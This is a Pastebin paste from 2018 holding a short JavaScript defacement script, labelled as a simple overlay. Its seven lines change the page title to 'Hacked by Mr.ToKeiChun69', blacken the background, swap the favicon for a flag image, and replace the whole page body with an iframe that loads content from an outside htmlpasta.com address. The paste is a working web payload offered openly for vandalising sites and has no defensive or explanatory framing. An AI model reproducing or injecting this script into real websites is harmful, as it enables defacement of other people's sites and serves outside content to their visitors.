ToKeiChun

Script JS Overlay Simple

Jun 1st, 2018
218
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.51 KB | None | 0 0
  1. document.title="Hacked by Mr.ToKeiChun69"
  2. document.body.style.background = "black";
  3. var shortc=document.createElement("link");
  4. shortc.rel="SHORTCUT ICON";
  5. shortc.href="https://cdn.countryflags.com/thumbs/indonesia/flag-round-250.png";
  6. document.getElementsByTagName("head")[0].appendChild(shortc);
  7. document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='https://fe204020-2a7e-4d23-9c89-d341a505d71c.htmlpasta.com/' height='935px' width='100%' scrolling='no' frameborder='0' allowfullscreen></center>";
Add Comment
Please, Sign In to add comment